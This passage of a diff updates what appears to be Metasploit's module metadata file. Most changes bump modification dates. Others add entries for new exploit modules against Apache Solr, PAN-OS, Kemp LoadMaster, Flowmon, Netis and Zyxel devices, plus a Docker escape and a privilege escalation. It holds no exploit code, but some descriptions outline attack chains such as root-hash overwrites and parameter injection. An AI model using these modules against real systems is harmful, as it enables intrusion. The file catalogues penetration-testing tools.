+    "mod_time": "2024-06-03 11:02:15 +0000",
     "path": "/modules/auxiliary/scanner/postgres/postgres_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/postgres/postgres_login",
@@ -50321,7 +51063,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2022-01-23 15:28:32 +0000",
+    "mod_time": "2024-06-28 10:21:08 +0000",
     "path": "/modules/auxiliary/scanner/redis/redis_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/redis/redis_login",
@@ -50487,7 +51229,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2024-02-22 14:18:29 +0000",
+    "mod_time": "2024-06-03 11:02:15 +0000",
     "path": "/modules/auxiliary/scanner/rservices/rexec_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/rservices/rexec_login",
@@ -50529,7 +51271,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2024-02-22 14:18:29 +0000",
+    "mod_time": "2024-05-21 11:00:24 +0000",
     "path": "/modules/auxiliary/scanner/rservices/rlogin_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/rservices/rlogin_login",
@@ -50571,7 +51313,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2024-02-22 14:18:29 +0000",
+    "mod_time": "2024-06-03 11:02:15 +0000",
     "path": "/modules/auxiliary/scanner/rservices/rsh_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/rservices/rsh_login",
@@ -50655,7 +51397,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2021-08-31 17:10:07 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
     "path": "/modules/auxiliary/scanner/sage/x3_adxsrv_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/sage/x3_adxsrv_login",
@@ -53145,7 +53887,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2024-06-13 15:30:31 +0000",
     "path": "/modules/auxiliary/scanner/scada/profinet_siemens.rb",
     "is_install_path": true,
     "ref_name": "scanner/scada/profinet_siemens",
@@ -53809,13 +54551,13 @@
     "author": [
       "hdm <x@hdm.io>"
     ],
-    "description": "Determine what local users exist via the SAM RPC service",
+    "description": "Determine what users exist via the SAM RPC service",
     "references": [
 
     ],
     "platform": "",
     "arch": "",
-    "rport": null,
+    "rport": 445,
     "autofilter_ports": [
       139,
       445
@@ -53825,7 +54567,7 @@
       "microsoft-ds"
     ],
     "targets": null,
-    "mod_time": "2024-02-02 14:26:43 +0000",
+    "mod_time": "2024-05-07 10:54:35 +0000",
     "path": "/modules/auxiliary/scanner/smb/smb_enumusers.rb",
     "is_install_path": true,
     "ref_name": "scanner/smb/smb_enumusers",
@@ -53919,7 +54661,7 @@
       "microsoft-ds"
     ],
     "targets": null,
-    "mod_time": "2024-04-09 15:24:02 +0000",
+    "mod_time": "2024-06-03 11:02:15 +0000",
     "path": "/modules/auxiliary/scanner/smb/smb_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/smb/smb_login",
@@ -53952,7 +54694,7 @@
     ],
     "platform": "",
     "arch": "",
-    "rport": null,
+    "rport": 445,
     "autofilter_ports": [
       139,
       445
@@ -53962,7 +54704,7 @@
       "microsoft-ds"
     ],
     "targets": null,
-    "mod_time": "2024-02-02 14:26:43 +0000",
+    "mod_time": "2024-05-16 10:45:25 +0000",
     "path": "/modules/auxiliary/scanner/smb/smb_lookupsid.rb",
     "is_install_path": true,
     "ref_name": "scanner/smb/smb_lookupsid",
@@ -54122,7 +54864,7 @@
       "microsoft-ds"
     ],
     "targets": null,
-    "mod_time": "2023-01-25 13:58:29 +0000",
+    "mod_time": "2024-05-07 10:54:35 +0000",
     "path": "/modules/auxiliary/scanner/smb/smb_version.rb",
     "is_install_path": true,
     "ref_name": "scanner/smb/smb_version",
@@ -54916,7 +55658,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2024-04-08 17:41:59 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
     "path": "/modules/auxiliary/scanner/snmp/snmp_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/snmp/snmp_login",
@@ -55211,7 +55953,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2024-02-22 14:18:29 +0000",
+    "mod_time": "2024-06-03 11:02:15 +0000",
     "path": "/modules/auxiliary/scanner/ssh/eaton_xpert_backdoor.rb",
     "is_install_path": true,
     "ref_name": "scanner/ssh/eaton_xpert_backdoor",
@@ -55257,7 +55999,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2024-02-22 14:18:29 +0000",
+    "mod_time": "2024-06-03 11:02:15 +0000",
     "path": "/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb",
     "is_install_path": true,
     "ref_name": "scanner/ssh/fortinet_backdoor",
@@ -55346,7 +56088,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2021-08-31 15:37:48 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
     "path": "/modules/auxiliary/scanner/ssh/karaf_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/ssh/karaf_login",
@@ -55389,7 +56131,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2024-02-22 14:18:29 +0000",
+    "mod_time": "2024-06-03 11:02:15 +0000",
     "path": "/modules/auxiliary/scanner/ssh/libssh_auth_bypass.rb",
     "is_install_path": true,
     "ref_name": "scanner/ssh/libssh_auth_bypass",
@@ -55590,7 +56332,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2024-02-22 14:18:29 +0000",
+    "mod_time": "2024-05-21 11:00:24 +0000",
     "path": "/modules/auxiliary/scanner/ssh/ssh_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/ssh/ssh_login",
@@ -55632,7 +56374,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2024-02-22 14:18:29 +0000",
+    "mod_time": "2024-06-03 11:02:15 +0000",
     "path": "/modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb",
     "is_install_path": true,
     "ref_name": "scanner/ssh/ssh_login_pubkey",
@@ -56048,7 +56790,7 @@
       "telnet"
     ],
     "targets": null,
-    "mod_time": "2024-02-22 14:18:29 +0000",
+    "mod_time": "2024-06-03 11:02:15 +0000",
     "path": "/modules/auxiliary/scanner/telnet/brocade_enable_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/telnet/brocade_enable_login",
@@ -56260,7 +57002,7 @@
       "telnet"
     ],
     "targets": null,
-    "mod_time": "2024-02-22 14:18:29 +0000",
+    "mod_time": "2024-06-03 11:02:15 +0000",
     "path": "/modules/auxiliary/scanner/telnet/telnet_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/telnet/telnet_login",
@@ -56784,7 +57526,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2019-06-27 17:06:32 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
     "path": "/modules/auxiliary/scanner/varnish/varnish_cli_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/varnish/varnish_cli_login",
@@ -56875,7 +57617,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2021-08-31 17:10:07 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
     "path": "/modules/auxiliary/scanner/vmware/vmauthd_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/vmware/vmauthd_login",
@@ -57469,7 +58211,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2021-08-31 17:10:07 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
     "path": "/modules/auxiliary/scanner/vnc/vnc_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/vnc/vnc_login",
@@ -57846,7 +58588,7 @@
       "winrm"
     ],
     "targets": null,
-    "mod_time": "2024-02-22 14:18:29 +0000",
+    "mod_time": "2024-06-03 11:02:15 +0000",
     "path": "/modules/auxiliary/scanner/winrm/winrm_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/winrm/winrm_login",
@@ -62307,7 +63049,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2023-06-02 10:22:56 +0000",
+    "mod_time": "2024-06-13 15:46:02 +0000",
     "path": "/modules/encoders/cmd/powershell_base64.rb",
     "is_install_path": true,
     "ref_name": "cmd/powershell_base64",
@@ -65529,9 +66271,10 @@
     "author": [
       "Jacob Baines",
       "Ron Bowes",
-      "jheysel-r7"
+      "jheysel-r7",
+      "Fabian Hafner"
     ],
-    "description": "This module exploits a PHP environment variable manipulation vulnerability affecting Juniper SRX firewalls\n          and EX switches. The affected Juniper devices run FreeBSD and every FreeBSD process can access their stdin\n          by opening /dev/fd/0. The exploit also makes use of two useful PHP features. The first being\n          'auto_prepend_file' which causes the provided file to be added using the 'require' function. The second PHP\n          function is 'allow_url_include' which allows the use of URL-aware fopen wrappers. By enabling\n          allow_url_include, the exploit can use any protocol wrapper with auto_prepend_file. The module then uses\n          data:// to provide a file inline which includes the base64 encoded PHP payload.\n\n          By default this exploit returns a session confined to a FreeBSD jail with limited functionality. There is a\n          datastore option 'JAIL_BREAK', that when set to true, will steal the necessary tokens from a user authenticated\n          to the J-Web application, in order to overwrite the root password hash. If there is no user\n          authenticated to the J-Web application this method will not work. The module then authenticates\n          with the new root password over SSH and then rewrites the original root password hash to /etc/master.passwd.",
+    "description": "This module exploits a PHP environment variable manipulation vulnerability affecting Juniper SRX firewalls\n          and EX switches. The affected Juniper devices run FreeBSD and every FreeBSD process can access their stdin\n          by opening /dev/fd/0. The exploit also makes use of two useful PHP features. The first being\n          'auto_prepend_file' which causes the provided file to be added using the 'require' function. The second PHP\n          function is 'allow_url_include' which allows the use of URL-aware fopen wrappers. By enabling\n          allow_url_include, the exploit can use any protocol wrapper with auto_prepend_file. The module then uses\n          data:// to provide a file inline which includes the base64 encoded PHP payload.\n\n          By default this exploit returns a session confined to a FreeBSD jail with limited functionality. There is a\n          datastore option 'JAIL_BREAK', that when set to true, will steal the necessary tokens from a user authenticated\n          to the J-Web application, in order to overwrite the root password hash. If there is no user authenticated\n          to the J-Web application this exploit will try to create one. If unsuccesfull this method will not work.\n          The module then authenticates with the new root password over SSH and then rewrites the original root password\n          hash to /etc/master.passwd. There is an option to set allow ssh root login, if disabled.",
     "references": [
       "URL-https://labs.watchtowr.com/cve-2023-36844-and-friends-rce-in-juniper-firewalls/",
       "URL-https://vulncheck.com/blog/juniper-cve-2023-36845",
@@ -65560,7 +66303,7 @@
       "PHP In-Memory",
       "Interactive SSH with jail break"
     ],
-    "mod_time": "2024-04-15 11:06:50 +0000",
+    "mod_time": "2024-06-14 10:45:19 +0000",
     "path": "/modules/exploits/freebsd/http/junos_phprc_auto_prepend_file.rb",
     "is_install_path": true,
     "ref_name": "freebsd/http/junos_phprc_auto_prepend_file",
@@ -66375,7 +67118,7 @@
     "targets": [
       "Generic RAR file"
     ],
-    "mod_time": "2022-08-22 11:46:50 +0000",
+    "mod_time": "2024-05-28 14:01:31 +0000",
     "path": "/modules/exploits/linux/fileformat/unrar_cve_2022_30333.rb",
     "is_install_path": true,
     "ref_name": "linux/fileformat/unrar_cve_2022_30333",
@@ -67284,6 +68027,69 @@
     "session_types": false,
     "needs_cleanup": null
   },
+  "exploit_linux/http/apache_solr_backup_restore": {
+    "name": "Apache Solr Backup/Restore APIs RCE",
+    "fullname": "exploit/linux/http/apache_solr_backup_restore",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2024-02-24",
+    "type": "exploit",
+    "author": [
+      "l3yx",
+      "jheysel-r7"
+    ],
+    "description": "Apache Solr from 6.0.0 through 8.11.2, from 9.0.0 before 9.4.1 is affected by an Unrestricted Upload of File\n          with Dangerous Type vulnerability which can result in remote code execution in the context of the user running\n          Apache Solr. When Apache Solr creates a Collection, it will use a specific directory as the classpath and load\n          some classes from it. The backup function of the Collection can export malicious class files uploaded by\n          attackers to the directory, allowing Solr to load custom classes and create arbitrary Java code. Execution\n          can further bypass the Java sandbox configured by Solr, ultimately causing arbitrary command execution.",
+    "references": [
+      "URL-https://xz.aliyun.com/t/13637?time__1311=mqmxnQ0QiQi%3DDtKDsD7md0%3DnxeqjghDMxTD",
+      "URL-https://github.com/rapid7/metasploit-framework/issues/18919",
+      "URL-https://github.com/vvmdx/Apache-Solr-RCE_CVE-2023-50386_POC",
+      "CVE-2023-50386"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd",
+    "rport": 8983,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Unix Command"
+    ],
+    "mod_time": "2024-04-04 13:41:08 +0000",
+    "path": "/modules/exploits/linux/http/apache_solr_backup_restore.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/apache_solr_backup_restore",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "config-changes"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
   "exploit_linux/http/apache_spark_rce_cve_2022_33891": {
     "name": "Apache Spark Unauthenticated Command Injection RCE",
     "fullname": "exploit/linux/http/apache_spark_rce_cve_2022_33891",
@@ -68415,6 +69221,69 @@
     "session_types": false,
     "needs_cleanup": true
   },
+  "exploit_linux/http/chaos_rat_xss_to_rce": {
+    "name": "Chaos RAT XSS to RCE",
+    "fullname": "exploit/linux/http/chaos_rat_xss_to_rce",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2024-04-10",
+    "type": "exploit",
+    "author": [
+      "h00die",
+      "chebuya"
+    ],
+    "description": "CHAOS v5.0.8 is a free and open-source Remote Administration Tool that\n          allows generated binaries to control remote operating systems. The\n          webapp contains a remote command execution vulnerability which\n          can be triggered by an authenticated user when generating a new\n          executable. The webapp also contains an XSS vulnerability within\n          the view of a returned command being executed on an agent.\n\n          Execution can happen through one of three routes:\n\n          1. Provided credentials can be used to execute the RCE directly\n\n          2. A JWT token from an agent can be provided to emulate a compromised\n          host. If a logged in user attempts to execute a command on the host\n          the returned value contains an xss payload.\n\n          3. Similar to technique 2, an agent executable can be provided and the\n          JWT token can be extracted.\n\n          Verified against CHAOS 7d5b20ad7e58e5b525abdcb3a12514b88e87cef2 running\n          in a docker container.",
+    "references": [
+      "URL-https://github.com/chebuya/CVE-2024-30850-chaos-rat-rce-poc",
+      "URL-https://github.com/tiagorlampert/CHAOS",
+      "CVE-2024-31839",
+      "CVE-2024-30850"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd",
+    "rport": 8080,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Automatic Target"
+    ],
+    "mod_time": "2024-05-13 16:55:43 +0000",
+    "path": "/modules/exploits/linux/http/chaos_rat_xss_to_rce.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/chaos_rat_xss_to_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "event-dependent",
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
   "exploit_linux/http/cisco_asax_sfr_rce": {
     "name": "Cisco ASA-X with FirePOWER Services Authenticated Command Injection",
     "fullname": "exploit/linux/http/cisco_asax_sfr_rce",
@@ -76640,6 +77509,68 @@
     "session_types": false,
     "needs_cleanup": null
   },
+  "exploit_linux/http/netis_unauth_rce_cve_2024_22729": {
+    "name": "Netis router MW5360 unauthenticated RCE.",
+    "fullname": "exploit/linux/http/netis_unauth_rce_cve_2024_22729",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2024-01-11",
+    "type": "exploit",
+    "author": [
+      "h00die-gr3y <h00die.gr3y@gmail.com>",
+      "Adhikara13"
+    ],
+    "description": "Netis router MW5360 has a command injection vulnerability via the password parameter on the login page.\n          The vulnerability stems from improper handling of the \"password\" parameter within the router's web interface.\n          The router's login page authorization can be bypassed by simply deleting the authorization header,\n          leading to the vulnerability. All router firmware versions up to `V1.0.1.3442` are vulnerable.\n          Attackers can inject a command in the 'password' parameter, encoded in base64, to exploit the command injection\n          vulnerability. When exploited, this can lead to unauthorized command execution, potentially allowing the attacker\n          to take control of the router.",
+    "references": [
+      "CVE-2024-22729",
+      "URL-https://attackerkb.com/topics/MvCphsf4LN/cve-2024-22729",
+      "URL-https://github.com/adhikara13/CVE/blob/main/netis_MW5360/blind%20command%20injection%20in%20password%20parameter%20in%20initial%20settings.md"
+    ],
+    "platform": "Linux",
+    "arch": "mipsle",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Linux Dropper"
+    ],
+    "mod_time": "2024-06-12 18:57:29 +0000",
+    "path": "/modules/exploits/linux/http/netis_unauth_rce_cve_2024_22729.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/netis_unauth_rce_cve_2024_22729",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": true
+  },
   "exploit_linux/http/netsweeper_webadmin_unixlogin": {
     "name": "Netsweeper WebAdmin unixlogin.php Python Code Injection",
     "fullname": "exploit/linux/http/netsweeper_webadmin_unixlogin",
@@ -77677,6 +78608,69 @@
     "session_types": false,
     "needs_cleanup": true
   },
+  "exploit_linux/http/panos_telemetry_cmd_exec": {
+    "name": "Palo Alto Networks PAN-OS Unauthenticated Remote Code Execution",
+    "fullname": "exploit/linux/http/panos_telemetry_cmd_exec",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2024-04-12",
+    "type": "exploit",
+    "author": [
+      "remmons-r7",
+      "sfewer-r7"
+    ],
+    "description": "This module exploits two vulnerabilities in Palo Alto Networks PAN-OS that\n          allow an unauthenticated attacker to create arbitrarily named files and execute\n          shell commands. Configuration requirements are PAN-OS with GlobalProtect Gateway or\n          GlobalProtect Portal enabled and telemetry collection on (default). Affected versions\n          include < 11.1.0-h3, < 11.1.1-h1, < 11.1.2-h3, < 11.0.2-h4, < 11.0.3-h10, < 11.0.4-h1,\n          < 10.2.5-h6, < 10.2.6-h3, < 10.2.8-h3, and < 10.2.9-h1. Payloads may take up to\n          one hour to execute, depending on how often the telemetry service is set to run.",
+    "references": [
+      "CVE-2024-3400",
+      "URL-https://security.paloaltonetworks.com/CVE-2024-3400",
+      "URL-https://www.volexity.com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-remote-code-execution-vulnerability-in-globalprotect-cve-2024-3400/",
+      "URL-https://attackerkb.com/topics/SSTk336Tmf/cve-2024-3400/rapid7-analysis"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd",
+    "rport": 443,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Default"
+    ],
+    "mod_time": "2024-04-18 18:34:18 +0000",
+    "path": "/modules/exploits/linux/http/panos_telemetry_cmd_exec.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/panos_telemetry_cmd_exec",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": true
+  },
   "exploit_linux/http/peercast_url": {
     "name": "PeerCast URL Handling Buffer Overflow",
     "fullname": "exploit/linux/http/peercast_url",
@@ -78089,6 +79083,129 @@
     "session_types": false,
     "needs_cleanup": null
   },
+  "exploit_linux/http/progress_flowmon_unauth_cmd_injection": {
+    "name": "Flowmon Unauthenticated Command Injection",
+    "fullname": "exploit/linux/http/progress_flowmon_unauth_cmd_injection",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2024-04-23",
+    "type": "exploit",
+    "author": [
+      "Dave Yesland with Rhino Security Labs"
+    ],
+    "description": "This module exploits an unauthenticated command injection vulnerability in Progress Flowmon\n          versions before v12.03.02.",
+    "references": [
+      "CVE-2024-2389",
+      "URL-https://rhinosecuritylabs.com/research/cve-2024-2389-in-progress-flowmon/",
+      "URL-https://support.kemptechnologies.com/hc/en-us/articles/24878235038733-CVE-2024-2389-Flowmon-critical-security-vulnerability"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd",
+    "rport": 443,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Automatic"
+    ],
+    "mod_time": "2024-05-28 16:29:55 +0000",
+    "path": "/modules/exploits/linux/http/progress_flowmon_unauth_cmd_injection.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/progress_flowmon_unauth_cmd_injection",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
+  "exploit_linux/http/progress_kemp_loadmaster_unauth_cmd_injection": {
+    "name": "Kemp LoadMaster Unauthenticated Command Injection",
+    "fullname": "exploit/linux/http/progress_kemp_loadmaster_unauth_cmd_injection",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2024-03-19",
+    "type": "exploit",
+    "author": [
+      "Dave Yesland with Rhino Security Labs"
+    ],
+    "description": "This module exploits an unauthenticated command injection vulnerability in\n          Progress Kemp LoadMaster in the authorization header after vversion 7.2.48.1.\n          The following versions are patched: 7.2.59.2 (GA), 7.2.54.8 (LTSF) and\n          7.2.48.10 (LTS).",
+    "references": [
+      "CVE-2024-1212",
+      "URL-https://rhinosecuritylabs.com/research/cve-2024-1212unauthenticated-command-injection-in-progress-kemp-loadmaster/",
+      "URL-https://kemptechnologies.com/kemp-load-balancers"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd",
+    "rport": 443,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Automatic",
+      "Do_Not_Prepend_Runonce_Code"
+    ],
+    "mod_time": "2024-04-26 17:36:50 +0000",
+    "path": "/modules/exploits/linux/http/progress_kemp_loadmaster_unauth_cmd_injection.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/progress_kemp_loadmaster_unauth_cmd_injection",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
   "exploit_linux/http/pulse_secure_cmd_exec": {
     "name": "Pulse Secure VPN Arbitrary Command Execution",
     "fullname": "exploit/linux/http/pulse_secure_cmd_exec",
@@ -79667,7 +80784,7 @@
       "Linux (x64)",
       "Linux (cmd)"
     ],
-    "mod_time": "2021-10-22 22:11:51 +0000",
+    "mod_time": "2024-06-14 12:05:12 +0000",
     "path": "/modules/exploits/linux/http/suitecrm_log_file_rce.rb",
     "is_install_path": true,
     "ref_name": "linux/http/suitecrm_log_file_rce",
@@ -81809,7 +82926,7 @@
     "targets": [
       "VMware vRealize Log Insight < v8.10.2"
     ],
-    "mod_time": "2023-09-12 10:16:13 +0000",
+    "mod_time": "2024-06-14 12:05:12 +0000",
     "path": "/modules/exploits/linux/http/vmware_vrli_rce.rb",
     "is_install_path": true,
     "ref_name": "linux/http/vmware_vrli_rce",
@@ -83291,6 +84408,67 @@
     "session_types": false,
     "needs_cleanup": null
   },
+  "exploit_linux/http/zyxel_parse_config_rce": {
+    "name": "Zyxel parse_config.py Command Injection",
+    "fullname": "exploit/linux/http/zyxel_parse_config_rce",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2024-01-24",
+    "type": "exploit",
+    "author": [
+      "SSD Secure Disclosure technical team",
+      "jheysel-r7"
+    ],
+    "description": "This module exploits vulnerabilities in multiple Zyxel devices including the VPN, USG and APT series.\n          The affected firmware versions depend on the device module, see this module's documentation for more details.\n\n          Note this module was unable to be tested against a real Zyxel device and was tested against a mock environment.\n          If you run into any issues testing this in a real environment we kindly ask you raise an issue in\n          metasploit's github repository: https://github.com/rapid7/metasploit-framework/issues/new/choose",
+    "references": [
+      "URL-https://ssd-disclosure.com/ssd-advisory-zyxel-vpn-series-pre-auth-remote-command-execution/",
+      "CVE-2023-33012"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Automatic Target"
+    ],
+    "mod_time": "2024-07-03 13:51:50 +0000",
+    "path": "/modules/exploits/linux/http/zyxel_parse_config_rce.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/zyxel_parse_config_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "config-changes"
+      ],
+      "Reliability": [
+
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": true
+  },
   "exploit_linux/http/zyxel_ztp_rce": {
     "name": "Zyxel Firewall ZTP Unauthenticated Command Injection",
     "fullname": "exploit/linux/http/zyxel_ztp_rce",
@@ -85043,6 +86221,65 @@
 
     ]
   },
+  "exploit_linux/local/docker_privileged_container_kernel_escape": {
+    "name": "Docker Privileged Container Kernel Escape",
+    "fullname": "exploit/linux/local/docker_privileged_container_kernel_escape",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2014-05-01",
+    "type": "exploit",
+    "author": [
+      "Nick Cottrell <Rad10Logic>",
+      "Eran Ayalon",
+      "Ilan Sokol"
+    ],
+    "description": "This module performs a container escape onto the host as the daemon\n            user. It takes advantage of the SYS_MODULE capability. If that\n            exists and the linux headers are available to compile on the target,\n            then we can escape onto the host.",
+    "references": [
+      "URL-https://www.cybereason.com/blog/container-escape-all-you-need-is-cap-capabilities",
+      "URL-https://github.com/maK-/reverse-shell-access-kernel-module"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Automatic"
+    ],
+    "mod_time": "2024-05-01 13:30:16 +0000",
+    "path": "/modules/exploits/linux/local/docker_privileged_container_kernel_escape.rb",
+    "is_install_path": true,
+    "ref_name": "linux/local/docker_privileged_container_kernel_escape",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": [
+      "shell",
+      "meterpreter"
+    ],
+    "needs_cleanup": true,
+    "actions": [
+
+    ]
+  },
   "exploit_linux/local/docker_runc_escape": {
     "name": "Docker Container Escape Via runC Overwrite",
     "fullname": "exploit/linux/local/docker_runc_escape",
@@ -86487,6 +87724,122 @@
 
     ]
   },
+  "exploit_linux/local/progress_flowmon_sudo_privesc_2024": {
+    "name": "Progress Flowmon Local sudo privilege escalation",
+    "fullname": "exploit/linux/local/progress_flowmon_sudo_privesc_2024",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2024-03-19",
+    "type": "exploit",
+    "author": [
+      "Dave Yesland with Rhino Security Labs"
+    ],
+    "description": "This module abuses a feature of the sudo command on Progress Flowmon.\n          Certain binary files are allowed to automatically elevate\n          with the sudo command.  This is based off of the file name.  This\n          includes executing a PHP command with a specific file name. If the\n          file is overwritten with PHP code it can be used to elevate privileges\n          to root. Progress Flowmon up to at least version 12.3.5 is vulnerable.",
+    "references": [
+      "URL-https://rhinosecuritylabs.com/research/cve-2024-2389-in-progress-flowmon/",
+      "URL-https://support.kemptechnologies.com/hc/en-us/articles/24878235038733-CVE-2024-2389-Flowmon-critical-security-vulnerability"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "x86, x64",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Automatic"
+    ],
+    "mod_time": "2024-05-29 08:39:06 +0000",
+    "path": "/modules/exploits/linux/local/progress_flowmon_sudo_privesc_2024.rb",
+    "is_install_path": true,
+    "ref_name": "linux/local/progress_flowmon_sudo_privesc_2024",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
